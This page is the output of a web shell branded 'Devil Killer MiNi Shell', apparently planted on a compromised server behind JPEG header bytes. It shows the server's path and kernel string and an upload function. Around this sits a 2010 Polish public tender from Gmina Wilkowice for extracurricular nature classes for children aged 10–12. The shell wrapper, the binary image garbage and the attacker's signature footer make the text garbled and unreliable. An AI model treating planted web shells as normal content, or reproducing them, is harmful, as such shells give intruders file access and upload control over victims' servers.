JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101004/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101004/317108-N-2010.html

<p class="kh_header"><b>Wilkowice: Usługa prowadzenia zajęć dodatkowych z przyrody dla dzieci w wieku szkolnym od 10 do 12 lat w placówkach szkolnych w Gminie Wilkowice. Usługa realizowana jest w ramach projektu pn. Lepsze jutro - wyrównywanie szans edukacyjnych uczniów z gminy Wilkowice, realizowanego w ramach priorytetu IX, działania 9.1 poddziałania 9.1.2 współfinansowanego z Unii Europejskiej środkami Europejskiego Funduszu Społecznego</b><br>
<b>Numer ogłoszenia: 317108 - 2010; data zamieszczenia: 04.10.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Wilkowice , ul. Wyzwolenia 25, 43-365 Wilkowice, woj. śląskie, tel. 033 4990077 w. 307, faks 033 4990077 w. 420.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wilkowice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa prowadzenia zajęć dodatkowych z przyrody dla dzieci w wieku szkolnym od 10 do 12 lat w placówkach szkolnych w Gminie Wilkowice. Usługa realizowana jest w ramach projektu pn. Lepsze jutro - wyrównywanie szans edukacyjnych uczniów z gminy Wilkowice, realizowanego w ramach priorytetu IX, działania 9.1 poddziałania 9.1.2 współfinansowanego z Unii Europejskiej środkami Europejskiego Funduszu Społecznego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usługi prowadzenia zajęć dodatkowych z przyrody dla dzieci w wieku od 10 do 12 lat w Gminie Wilkowice. Usługa realizowana jest w ramach projektu pn. Lepsze jutro - wyrównywanie szans edukacyjnych uczniów z gminy Wilkowice realizowanego w ramach priorytetu IX, działania 9.1 poddziałnia 9.1.2 Programu Operacyjnego Kapitał Ludzki 2007 - 2013 współfinansowanego z Unii Europejskiej środkami Europejskiego Funduszu Społecznego. Zajęcia z przyrody prowadzone będą w wymiarze 196 godzin w tym: -Zespół Szkolno - Przedszkolny w Mesznej: 84 godzin, -Szkoła Podstawowa w  Bystrej: 56 godzin, -Szkoła Podstawowa w Wilkowicach: 56 godzin. Maksymalna liczebność grupy dzieci, w której prowadzone będą zajęcia z przyrody to 10 osób. Wskazana powyżej liczba godzin stanowi maksymalną ilość godzin możliwą do realizacji w ramach niniejszego zamówienia. Liczba ta może ulec zmianie ze względu na planowaną rekrutację uczestników projektu na rok szkolny 2010/2011 oraz ze względu na inne zdarzenia losowe, których zamawiający na etapie tworzenia SIWZ nie mógł przewidzieć. Gwarantowaną liczbę godzin stanowić będzie 80 % maksymalnej liczby godzin podanej w niniejszym zamówieniu. Zmiana ilości godzin w ramach umowy może różnić się od wartości podanych w niniejszym ogłoszeniu o zamówieniu nie więcej niż o 20% wartości jednej części zamówienia.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.05.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O dopuszczenie do udziału w zamówieniu, którego przedmiotem jest prowadzenie zajęć z przyrody dla dzieci w wieku szkolnym mogą się ubiegać osoby, które posiadają niezbędną wiedzę oraz doświadczenie tj. spełniają przynajmniej jedną z alternatyw opisanych w punkcie III.3.4 podpunkt 1-7 oraz: 1. ukończyły praktyki zawodowe zgodne z nauczanym przedmiotem lub prowadzonymi zajęciami w wymiarze minimum 150 godzin, lub 2. posiadają staż pracy związany z nauczanym przedmiotem minimum lub prowadzonymi zajęciami 1 rok, lub 3. posiadają doświadczenie związane z nauczanym przedmiotem lub prowadzonymi zajęciami w placówkach oświatowych (szkolnych) minimum 6 miesięcy, lub 4. posiadają doświadczenie związane z nauczanym przedmiotem lub prowadzonymi zajęciami w placówkach opiekuńczych dla dzieci w wieku szkolnym od 10 do 12 lat minimum 6 miesięcy. Ocena spełniania tego warunku prowadzona będzie na podstawie oświadczenia zawartego we wniosku o dopuszczenie do udziału w postępowaniu jak również na postawie analizy dokumentów poświadczających wiedzę i doświadczenie tj. kserokopię poświadczenia odbycia praktyk zawodowych, referencji, świadectw pracy itp. Za każdą z wymienionych wyżej alternatyw (od 1 do 4) Zamawiający przydzieli 1 punkt. Ponadto za posiadanie dodatkowego doświadczenia w zakresie alternatyw opisanych wyżej (od 1 do 4) np. dłuższy niż wymagany czas odbytych praktyk, dłuższy niż wymagany czas stażu pracy czy też doświadczenia itp. Zamawiający przydzieli 2 punkty bez względu na czas i ilość o ile przekracza ona minimalne wartości wskazane w punkcie od 1 do 4. W celu spełnienia warunku konieczne jest uzyskanie przynajmniej 1 punktu z alternatyw określonych w podpunktach 1-4. Uzyskanie dodatkowych punktów z tego etapu oceny będzie miało znaczenie przy wyborze wykonawców, którzy zostaną zaproszeni do złożenia oferty wstępnej</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zgodnie z Rozporządzeniem Ministra Edukacji Narodowej z dnia 12 marca 2009 roku (Dziennik Ustaw Nr 50, poz. 400) o dopuszczenie do udziału w zamówieniu, którego przedmiotem jest prowadzenie zajęć dodatkowych z przyrody dla dzieci w wieku szkolnym mogą się ubiegać osoby, które ukończyły: 1. Studia magisterskie w zakresie biologii lub geografii oraz posiadają przygotowanie pedagogiczne, lub 2. Studia magisterskie na dowolnym kierunku i studia podyplomowe w zakresie biologii lub geografii lub przyrody oraz posiada przygotowanie pedagogiczne, lub 3. Studia pierwszego stopnia w zakresie biologii lub geografii oraz posiada przygotowanie pedagogiczne, lub 4. Studia pierwszego stopnia na dowolnym kierunku (specjalności) i studia podyplomowe w zakresie biologii lub geografii lub przyrody oraz posiada przygotowanie pedagogiczne, lub 5. Studia pierwszego stopnia na kierunku (specjalności) zgodnym z nauczanym przedmiotem lub prowadzonymi zajęciami oraz posiadają przygotowanie pedagogiczne lub 6. Studia pierwszego stopnia na kierunku, którego zakres określony w standardzie kształcenia dla tego kierunku studiów w grupie treści podstawowych i kierunkowych obejmuje treści nauczanego przedmiotu lub prowadzonych zajęć oraz posiadają przygotowanie pedagogiczne lub 7. Studia wyższe na kierunku (specjalności) innym niż wymieniony wyżej, a ponadto ukończyła studia podyplomowe lub kurs kwalifikacyjny w zakresie nauczanego przedmiotu lub prowadzonych zajęć oraz posiadają przygotowanie pedagogiczne. Ocena spełniania tego warunku prowadzona będzie na podstawie oświadczenia zawartego w wniosku o dopuszczenie do udziału w postępowaniu jak również na postawie analizy dokumentów poświadczających posiadane wykształcenie tj. kserokopii dyplomów, certyfikatów, świadectw itp. Za każdą z wymienionych wyżej alternatyw (od 1 do 7) Zamawiający przydzieli 1 punkt. Ponadto za posiadanie dodatkowych kwalifikacji np. kurs medyczny (pierwszej pomocy),itp. Zamawiający przydzieli 2 punkty bez względu na ilość posiadanych kwalifikacji dodatkowych. W celu spełnienia warunku konieczne jest uzyskanie przynajmniej 1 punktu z alternatyw określonych w podpunktach 1-7. Uzyskanie dodatkowych punktów z tego etapu oceny będzie miało znaczenie przy wyborze wykonawców, którzy zostaną zaproszeni do złożenia oferty wstępnej</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wraz z wnioskiem o dopuszczenie do udziału w postępowaniu należy dołączyć dokumenty o których mowa w punkcie III.3 niniejszego postępowania</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> negocjacje z ogłoszeniem.</p>
<p><b>IV.1.2) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu:</b> 4.</p>
<p class="bold">Znaczenie warunków wyboru wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu</p>
<p>Zamawiający będzie oceniał spełnianie warunków metodą zerojedynkową. Oznacza to, że wystarczającym powodem do wykluczenia wykonawcy może być brak w ofercie któregokolwiek z wymaganych dokumentów, z zastrzeżeniem art. 26 ust. 3 i 4 ustawy Prawo Zamówień Publicznych. W zakresie warunków opisanych w pkt. III.3.2 oraz III.3.4 maksymalna liczba punktów do uzyskania wynosi 15. Do udziału w postępowaniu zostaną zaproszeni wyłącznie ci wykonawcy, którzy uzyskali minimum 1 punkt z alternatyw w podpunktach 1 - 7 wskazanych w pkt. III.3.4 oraz minimum 1 punkt z alternatyw w podpunktach 1 - 4 wskazanych w punkcie III.3.2. Warunkiem koniecznym niezbędnym do dopuszczenia do udziału w postępowaniu jest więc uzyskanie łącznie minimum 2 punktów z podpunktów jw. Minimalna liczba punktów konieczna do uzyskania to 2 z zastrzeżeniem warunków opisanych wyżej. Maksymalna liczba możliwa do uzyskania to 15. Do złożenia oferty wstępnej zostanie zaproszonych maksymalnie 3 Wykonawców do każdej części zamówienia, których Wnioski o dopuszczenie do udziału w postępowaniu uzyskały największą ilość punktów</p>
<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Dot. zmiany zakresu przedmiotu zamówienia - Wskazana w zamówieniu liczba godzin stanowi maksymalną ilość godzin możliwą do realizacji w ramach niniejszego zamówienia. Liczba ta może ulec zmianie ze względu na planowaną rekrutację uczestników projektu na rok szkolny 2010/2011 oraz ze względu na inne zdarzenia losowe, których zamawiający na etapie tworzenia SIWZ nie mógł przewidzieć pomimo zachowania zasad staranności. Gwarantowaną liczbę godzin stanowić będzie 80% maksymalnej ilości godzin wskazanych w niniejszym zamówieniu. Zmiana ilości godzin w ramach przedmiotu zamówienia może różnić się od wartości maksymalnych podanych w niniejszym ogłoszeniu o zamówieniu nie więcej niż o 20% wartości jednej części zamówienia. 2. Dot. zmiany wynagrodzenia - Rozliczenie świadczonych usług w ramach przedmiotu umowy nastąpi na podstawie kart czasu pracy oraz przedłożonego rachunku w oparciu o ceny jednostkowe ryczałtowe zawarte w ofercie wykonawcy oraz rzeczywiście wykonany zakres usług (rzeczywista liczba przepracowanych godzin) wynikających z kart czasu pracy. 3. Dot. zmiany harmonogramu usługi - Realizacja przedmiotu zamówienia odbywać się będzie w okresie wskazanym przez Zamawiającego z możliwością zmiany dat dotyczących danych dni realizacji zamówienia o ile Zamawiający zostanie o tym poinformowany pisemnie z 3 dniowym wyprzedzeniem i wyrazi na to zgodę. 4. Dot. zmiany osób świadczących przedmiot zamówienia - Zmiana Wykonawcy w trakcie realizacji przedmiotu zamówienia, musi być uzasadniona przez Wykonawcę na piśmie i wymaga zaakceptowania przez Zamawiającego. Zamawiający zaakceptuje taką zmianę w terminie 7 dni od daty przedłożenia propozycji wyłącznie wtedy, gdy kwalifikacje i doświadczenie wskazanej osoby będą spełniać warunki postawione w tym zakresie w Specyfikacji Istotnych Warunków Zamówienia. Zamawiający może także zażądać od Wykonawcy zmiany osoby, o której mowa wyżej, jeżeli uzna, że nie wykonuje ona należycie swoich obowiązków. Wykonawca zobowiązany jest dokonać zmiany tej osoby w terminie nie dłuższym niż 7 dni od daty złożenia wniosku przez Zamawiającego</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Wilkowice ul. Wyzwolenia 25 43-365 Wilkowice, pok. 303..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.10.2010 godzina 14:00, miejsce: Urząd Gminy Wilkowice ul. Wyzwolenia 25 43-365 Wilkowice, woj. Śląskie, Biuro Obsługi Klienta / Dziennik podawczy.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie udzielane jest na potrzeby projektu pn. Lepsze jutro - wyrównywanie szans edukacyjnych uczniów z gminy Wilkowice, realizowanego w ramach priorytetu IX, działania 9.1 poddziałnia 9.1.2. Zamówienie współfinansowane z Unii Europejskiej środkami Europejskiego Funduszu Społecznego Programu Operacyjnego Kapitał Ludzki 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zajęcia dodatkowe z przyrody prowadzone z dziećmi w wieku 10-12 lat w Zespole Szkolno - Przedszkolnym w Mesznej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> REALIZACJA 84 GODZIN ZAJĘĆ DODATKOWYCH Z PRZYRODY DLA DZIECI W WIEKU OD 10 DO 12 LAT, W ZESPOLE SZKOLNO - PRZEDSZKOLNYM W MESZNEJ: W OKRESIE OD 01.11.2010 DO 31.05.2011 W GODZINACH (ZAMIENNIE) OD 8:00 DO 9:00 LUB OD 13:00 DO 18:00.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.05.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zajęcia dodatkowe z przyrody prowadzone z dziećmi w wieku 10-12  lat w Szkole Podstawowej w Bystrej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> REALIZACJA 56 GODZIN ZAJĘĆ DODATKOWYCH Z PRZYRODY DLA DZIECI W WIEKU OD 10 DO 12 LAT W SZKOLE PODSTAWOWEJ W BYSTREJ W OKRESIE OD 01.11.2010 DO 31.05.2011 W GODZINACH (ZAMIENNIE) OD 8:00 DO 9:00 LUB OD 13:00 DO 18:00.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.05.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zajęcia dodatkowe z przyrody prowadzone z dziećmi w wieku 10-12 lat w Szkole Podstawowej w Wilkowicach.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> REALIZACJA 28 GODZIN ZAJĘĆ DODATKOWYCH Z PRZYRODY DLA DZIECI W WIEKU OD 10 DO 12 LAT W SZKOLE PODSTAWOWEJ W WILKOWICACH W OKRESIE OD 01.11.2010 DO 31.05.2011 W GODZINACH (ZAMIENNIE) OD 8:00 DO 9:00 LUB OD 13:00 DO 18:00.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.05.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zajęcia dodatkowe z przyrody prowadzone z dziećmi w wieku 10-12 lat w Szkole Podstawowej w Wilkowicach.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> REALIZACJA 28 GODZIN ZAJĘĆ DODATKOWYCH Z PRZYRODY DLA DZIECI W WIEKU OD 10 DO 12 LAT W SZKOLE PODSTAWOWEJ W WILKOWICACH W OKRESIE OD 01.11.2010 DO 31.05.2011 W GODZINACH (ZAMIENNIE) OD 8:00 DO 9:00 LUB OD 13:00 DO 18:00.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.05.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com